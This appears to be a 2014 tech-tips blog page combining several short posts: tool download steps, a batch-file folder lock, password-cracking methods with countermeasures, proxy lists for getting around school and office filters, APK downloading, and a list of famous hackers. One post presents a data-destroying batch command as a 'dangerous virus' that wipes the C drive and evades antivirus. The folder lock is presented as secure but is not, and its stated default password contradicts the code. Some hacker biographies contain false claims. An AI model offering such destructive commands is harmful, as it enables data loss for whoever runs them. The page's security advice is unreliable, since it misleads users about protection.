Tuesday, January 21, 2014

Use Facebook Blocker

How To Use Facebook Blocker ? 

 1. First download Facebook Blocker by Clicking Here
 2. Extract the file and right click on Facebook Blocker.exe and run it as administator(Important)
 3. Press 1 in order to  backup your host file to be on the safe side.
facebook blocker
  4. Now Press 2 to block facebook
  5. Its time to check if facebook is blocked or not to do that Press 5
  6. Hope this help you

How To Block Youtube Ads ?


block youtube ads
Most of you get bored or annoyed due ads playing before youtube videos. Today i willshare with you an amazing peace of programme called Block YouTube Ads . It removes all video ads before and during videos, as well as removes all those ads that pop at the bottom of the screen while the video is playing. It works on all major browser such Internet explorer, google chrome and mozilla firefox.

How to do ?

  1. Download Youtube Ads Blocker
  2. Double click on downloaded file.
  3. Follow the on screen instruction.

Password Protect Any Folder Without Any Software

In this tutorial you will learn interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.

How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
 
 
cls
@ECHO OFF
title 4geeksworld.blogspot.in
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== 4geeksworld goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End

   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is geeksworld)
  • To change the password replace geeksworld with new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Most Common Password Cracking Methods And Their Countermeasures

There are number of methods out their used by hackers to hack your account or get your personal information. Today in this post i will share with you guys 6 Most commonly used method to crack password and their countermeasures. You must check out this article to be safe and to prevent your online accounts from hacking.

1. BruteForce Attack

brute force attack
Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the rightpassword is match. Brute-force attacks can take very long time depending upon the complexity of the password. The cracking time is determined by the speed of computerand complexity of the password.

Countermeasure: Use long and complex passwords. Try to use combination of upper and lowercase letters along with numbers. Brute-force attack will take hundreds or even thousands of years to crack such complex and long passwords.
Example: Passwords like "iloveu" or "password" can be cracked easily whereas computer will take years to crack passwords like "aN34lL00"

2. Social Engineering

Social engineering is process of manipulating someone to trust you and get information from them. For example, if the hacker was trying to get the password of a co-workers or friends computer, he could call him pretending to be from the IT department and simply ask for his login details. Sometime hackers call the victim pretending to be from bank and ask for their credit cards details. Social Engineering can be used to get someone password, to get bank credentials or any personal information.

Countermeasure: If someone tries to get your personal or bank details ask them few questions. Make sure the person calling you is legit. Never ever give your credit card details on phone.

3. Rats And Keyloggers

keylogger
In keylogging or RATing the hacker sends keylogger or rat to the victim. This allows hacker to monitor every thing victim do on his computer. Every keystroke is logged including passwords. Moreever hacker can even control the victims computer.

Countermeasure: Never login to your bank account from cyber cafe or someone else computer. If its important use on-screen or virtual keyboard while tying the login. Use latest anti-virus software and keep them updated. 

    4. Phishing

    phishing hacking
    Phishing is the most easiest and popular hacking method used by hackers to get someone account details. In Phishing attack hacker send fake page of real website like facebook, gmail to victim. When someone login through that fake page his details is send to the hacker. This fake pages can be easily created and hosted on free web-hosting sites.

    Countermeasure: Phishing attacks are very easy to avoid. The url of this phishing pages are different from the real one. For example URL of phishing page of facebook might look like facbbook.com (As you can see There are two "b"). Always make sure that websites url is correct.

    5. Rainbow Table

    A Rainbow table is a huge pre-computed list of hashes for every possible combination of characters. A password hash is a password that has gone through a mathematical algorithm such as md5 and is transformed into something which is not recognizable. A hash is a one way encryption so once a password is hashed there is no way to get the original string from the hashed string. A very commonly used hashing algorithm to store passwords in website databases is MD5. It is almost similar to dictionary attack, the only difference is, in rainbow tables attack hashed characters are used as passwords whereas in dictionary attack normal characters are used as passwords. 

    Example: ‘hello’ in md5 is 5d41402abc4b2a76b9719d911017c592 and zero length string ("") is d41d8cd98f00b204e9800998ecf8427e

    Countermeasure: Make sure you choose password that is long and complex. Creating tables for long and complex password takes a very long time and a lot of resources

    6. Guessing

    password guessing
    This seems silly but this can easily help you to get someones password within seconds. If hacker knows you, he can use information he knows about you to guess yourpassword. Hacker can also use combination of Social Engineering and Guessing to acquire your password.

    Countermeasure: Don't use your name, surname, phone number or birthdate as your password. Try to avoid creating password that relates to you. Create complex and long password with combination of letters and numbers.

    Create A Undeletable And Unrenamable Folders In Windows

    creating undeleteable files
    In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

    Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.

    How To Create Undeletable And Unrenamable Folders ?

    1. Go to Start and then Click on Run
    2. Type cmd & hit enter (To open Command Prompt ).
    3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
    4. Type D: or E: and hit enter
    5. Type md con\ and hit enter (md - make directory)
    6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
    7. Open that directory, you will see the folder created of name con.
    8. Try to delete that folder or rename that folder windows will show the error message.

    How to delete that folder ?

    It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
    1. Open Command Prompt
    2. Type D: ( if u created this type of folder in D: drive) & hit enter
    3. Type rd con\ (rd - remove directory)
    4. Open that directory and the folder will not appear because it is removed.

    Simple & dangerous virus,make it



    How to Make the virus ?

       1. Open Notepad and copy below code into it.

                               @Echo off
                               Del C:\ *.* |y

       2. Save this file as virus.bat (Name can be anything but .bat is must)
       3. Now, running this file will delete all the content of C Drive.


    Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
    You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus

    How to open facebook and block web from school and restricted places



    Below is the list of some good proxy site which you can use to surf anonymously on the internet . Even you can use this proxy sites to open block website in school or offices. For example you can use facebook if it is block at your school or office.
    Washington Woman Has Weight Loss Photo Banned by Facebook
    Here is proxy list:--

    http://aniscartujo.com/webproxy
    http://www.badboysproxy.com
    http://www.surfscreened.com
    http://www.hagiomusic.info
    http://www.greenpips.info
    http://urlbrowse.com
    http://www.hideipaddress.net
    http://www.sneakfilter.com
    http://www.browsestealth.com
    http://www.sneak1.info
    http://proxiesrus.com
    http://www.surfindark.com
    http://www.navydog.com
    http://falsario.com
    http://www.proxypit.com
    http://www.proxypan.com
    http://myspacewebproxy.org/
    http://www.allfreehere.info
    http://www.takefreely.info
    http://autobypass.com
    http://www.proxcity.info
    http://www.proxyzip.org
    http://www.cheekyproxy.com
    http://www.eggproxy.com
    http://www.theschoolcloak.com
    http://www.hidemefast.com
    http://browseanywhere.info
    http://www.404surf.com
    http://www.cloakip.net
    http://www.browsedark.com
    http://www.dartprox.com
    http://www.proxish.com
    http://www.surfsneak.com
    http://www.surfsneaky.com
    http://www.browsehidden.com
    http://www.filterhide.com
    http://www.browsesneak.com
    http://myspaceproxyy.com
    http://www.browsesneaky.com
    http://www.proxyz.us
    http://www.sneakschool.com
    http://www.iphide.com
    http://www.proogle.info
    http://greatproxy.info
    http://www.playnsurf.info
    http://www.realproxy.info
    http://aplusproxy.com
    http://www.ecoproxy.com
    http://freedom.webtuo.com
    http://www.slyuser.com/
    http://tenpass.com
    http://pawxy.com
    http://pawxy.org
    http://logu.in

    How To Open Banned Websites

    How To Open Banned Websites With Proxy Site? 

    How To Open Banned Site ?

    1. Open www.incloak.com in your browser.
    You can also use any proxy site from list below
    • List Of Good Proxy Sites are at last of the post
    2. After that enter the URL of the site which you want to open like below.
    Open Banned Websites WIth Proxy Sites
    3. Now click the Hide Me button,that's it.

    list:-

    http://aniscartujo.com/webproxy
    http://www.badboysproxy.com
    http://www.surfscreened.com
    http://www.hagiomusic.info
    http://www.greenpips.info
    http://urlbrowse.com
    http://www.hideipaddress.net
    http://www.sneakfilter.com
    http://www.browsestealth.com
    http://www.sneak1.info
    http://proxiesrus.com
    http://www.surfindark.com
    http://www.navydog.com
    http://falsario.com
    http://www.proxypit.com
    http://www.proxypan.com
    http://myspacewebproxy.org/
    http://www.allfreehere.info
    http://www.takefreely.info
    http://autobypass.com
    http://www.proxcity.info
    http://www.proxyzip.org
    http://www.cheekyproxy.com
    http://www.eggproxy.com
    http://www.theschoolcloak.com
    http://www.hidemefast.com
    http://browseanywhere.info
    http://www.404surf.com
    http://www.cloakip.net
    http://www.browsedark.com
    http://www.dartprox.com
    http://www.proxish.com
    http://www.surfsneak.com
    http://www.surfsneaky.com
    http://www.browsehidden.com
    http://www.filterhide.com
    http://www.browsesneak.com
    http://myspaceproxyy.com
    http://www.browsesneaky.com
    http://www.proxyz.us
    http://www.sneakschool.com
    http://www.iphide.com
    http://www.proogle.info
    http://greatproxy.info
    http://www.playnsurf.info
    http://www.realproxy.info
    http://aplusproxy.com
    http://www.ecoproxy.com
    http://freedom.webtuo.com
    http://www.slyuser.com/
    http://tenpass.com
    http://pawxy.com
    http://pawxy.org
    http://logu.in 

     

    How to View Saved Password In Google Chrome


    How to view saved password in google chrome ?


    Open Google Chrome
    1. Go to Settings (Its on the Right Corner)
    2. Then Click on Advance Settings
    3. Scroll Down and their will be password and forms from their click on Manage saved password.
    4. Then list of all websites whose passwords are saved on browser will be listed.
    5. Click on show to view those passwords
    6. Enjoy!!

    How To Download .APK Files Directly From Google Play?

    people get apps for their android device by downloading them from Google Play Store. The downloader gets the app installed for you, without bothering you with unnecessary details like the files required for installation etc. But what if you don’t have access to internet and you want an app installed on your phone? Surely you can’t do so without downloading stuff required for the installation. The solution to this problem is simple - just get the APK package of the desired app, and keep it beforehand for later when you need.
    APK stands for Android Package. It’s actually a package which contains all the filesnecessary for installation. In other words, it’s a ‘standalone’ installer for your app which doesn’t require internet connectivity. You can get APK package of an android application from Google Play Store by simply adding an extension called ‘APK Downloader’ to your Google browser. Here we have a step by step procedure which will tell you how to add APK Downloader to your Google Chrome and subsequently, use it for getting APK packages Once downloaded, the extension is to be added to your Google Chrome Extensions. To do so, follow these steps.
    • Go to the ‘Tools’ menu of your Chrome and select ‘Extensions’.
    • Locate the file you just downloaded (with extension ‘.crx’)
    • Now drag the file to your Extensions page.
    • For confirmation look for a small Play Store icon on your address bar
    To configure the APK Downloader extension for your android device
    • Select the ‘options’ button on the menu
    • Enter the Gmail ID (the one required for Play Store)
    • Enter your password and device ID of your android device

    For those of you who don’t know where to get device ID of your android device
    • Dial  “*#*#8255#*#*” from your android phone
    If you are using an android tablet
    • Go to Google Play Store
    • Download ‘Device ID’
    Device ID

    Device ID will get your device ID for you.

    Getting APK of an app is simple, just locate the app you want (on Play Store) and clicking on the APK icon on your address bar will get you your precious APK for that app. Another good thing about APK package is that it makes app sharing simple, now you can share an app with your friends by simply transferring the package to their device.

    APK Icon

    The APK and APK Downloader will make your life a lot easier if you face problems in installing your favorite apps due to connectivity issues or if you like to share your favorite apps with your friends.

    Top hackers

    Top White Hat Hackers

    1. Stephen Wozniak

    Stephen Wozniak white hat hacker
    Stephen Wozniak, The Great Woz, as many hackers call him, moreover, he is “the second half” of Steve Jobs and Apple empire, became as an icon and inspiration for many people, who never lost interest in computer technology. What did he actually do? It is well-known today that he made free long-distance calls possible exploring so-called blue boxes, at the time, when high technology has made its first baby steps. Nevertheless, one should accept that Woz is an independent developer and worked for the good of people. Currently, Stephen Wozniak is preaching charity and provides new technologies. One can truly say that Stephen Wozniak made a difference in this world and he deserves to be called as a white hat hacker.

    2. Tim Berners-Lee 

    Tim Berners-Lee white hat hacker
    Tim Berners-Lee is well-known around the world as fonder of the web we use - World Wide Web. No wonder that this man invented his first computer using iron, as they say necessity is the mother of invention. Doubtless, his innovating had led him to becoming a president of the Open Data Institute in 2012.

    3. Linus  Torvals 

    Linus Torvals white hat hacker
    Linus Torvals created Linux operation system, which many of us use. At the beginning, this system was about to be called as Freax, using the combination of words “ freak” and “free”. Luckily, nowadays we know it as Linux. As Linus himself once said that all he wanted to have fun doing something he really enjoys. This seems to confirm the idea that it is the great result of having fun!

    4. Tsutomu Shimomura 

    Tsutomu Shimomura  white hat hacker
    Tsutomu Shimomura is also a very goodexample of a white hat hacker. The bottom line is he tracked down another hacker –Kevin Mitnick, who actually was a black hathacker. However, later on he has entered the ranks of white hats. Tsutomu Shimomura caught Mitnick with flying colors hacking Mitnick’s phone. Good job catching “black knight”. Currently Shimomura is CEO and CTO of Neofocal System.

    5. Richard Matthew Stallman 

    Richard Matthew Stallman white hat hacker
    Richard Matthew Stallman is known also by his initials – RMS. His policy is to give users freedom of usage software as well as education, freedom of voice and choice. He has developed Free software foundation, GNU project, which allows use computer and its devices for free
    What is more, RMS is a founder of copyright concept. Among the list if his merits are 14 doctorates and professorships.

    6. Johanna Rutkowska.

    Johanna Rutkowska white hat hacker
    When it goes about technology and computers, most of the time we mentioned men. Women weren’t pathfinders in this area, however, they have done enough to be mentioned among outstanding white hats. Thus, this smart lady could hide root kits in software and hardware and to make them invisible to a naked eye. One must admit the talent of he woman. To draw the conclusion, one can say that enumerated people have brought its own contribution in foundation and innovation of computer technologies. Until the world has such brainy “white knights”, its save.

    How to learn programming languages online

    Top 6 Websites To Learn Computer Programming Language

    1. W3schools.com

    If you are a beginner or intermediate programmer, then w3schools is an excellent website for learning programming. W3schools offer tutorials for a variety of web programming and scripting languages such as html, html5, css, asp, Ajax, JavaScript, php, jQuery etc. So, if you are into web development then w3schools would be a great learning resource.
    Learn Computer Programming

    2. Codeavengers.com:

    If you want learn coding for making games, apps or websites using html/html5, css3, JavaScript python, but want an entertaining teaching resource. Then codeavengers.com is ideal choice for you. Codeavengers.com was designed by keeping difficulty for beginners in mind. It provides a fun and interactive learning environment that is effective for all age groups. Even if you are an intermediate programmer, you might find some great learning stuff there.

    Learn Computer Programming 

    3. Codecademy.com

    Codeacademy is another great website, for learning languages like JavaScript, HTML/CSS, PHP, Python, and Ruby. You can even learn how to use some popular web APIs in your website or app. Codeacademy has a great modern learning system, which is based on user interaction. It has full-fledged programming courses for beginners. Again, this website is great for beginners and intermediate learners. But advanced programmers can also find some pretty useful stuff there.

    Learn Computer Programming

    4. tutorialspoint.com

    Tutorialspoint has tutorials for a lot of web, high level and scripting languages that are commonly used today. You can find tutorials for any computer language that you have ever heard of (those that are currently in used). Apart from that, it also features a variety of tutorials for other fields such as DIP, OS, SEO, Telecom, DBMS, and frameworks etc.  Some commonly used languages that you can learn there are: Java, C++, PHP, Python, Ruby, C#, Perl, VB.Net, ios.

    Learn Computer Programming

    5. msdn.microsoft.com

    Although, beginner programmers might find MSDN (Microsoft Developer Network) a toughlearning resource, it is still the best resource you can get, if you want to master Microsoft oriented languages such as VB.Net, C# etc. MSDN has great tutorials for beginners, intermediate and advance programmers.
    Learn Computer Programming

    But as I stated earlier, beginners might not be initially comfortable with MDSN, as I has really a lot of resources that it would be a hard time for beginners to find what they are looking for. But if you get used to MSDN, then it is the ideal learning point for Microsoftoriented languages. You can get a lot of sample applications, tutorials and resources that are uploaded by Microsoft and MSDN community. Since it’s a developer’s network, you can even find development help from community members.

    6. Lynda.com

    You might already know about Lynda.com. Lynda offers easy to follow video tutorials. Lynda.com is an old and well established tutoring site, if you are looking for video tutorials to learn computer languages, then Lynda is your ideal choice. Apart from programming languages, Lynda also offers tutorials for a variety of other fields such as3D modeling, CAD, Photography etc. Lynda.com is an old and well established tutoring site.

    Learn Computer Programming

    So the next time someone asks you about your computer skills, you know where to turn. I hope you will learn a lot from these websites. All the best :)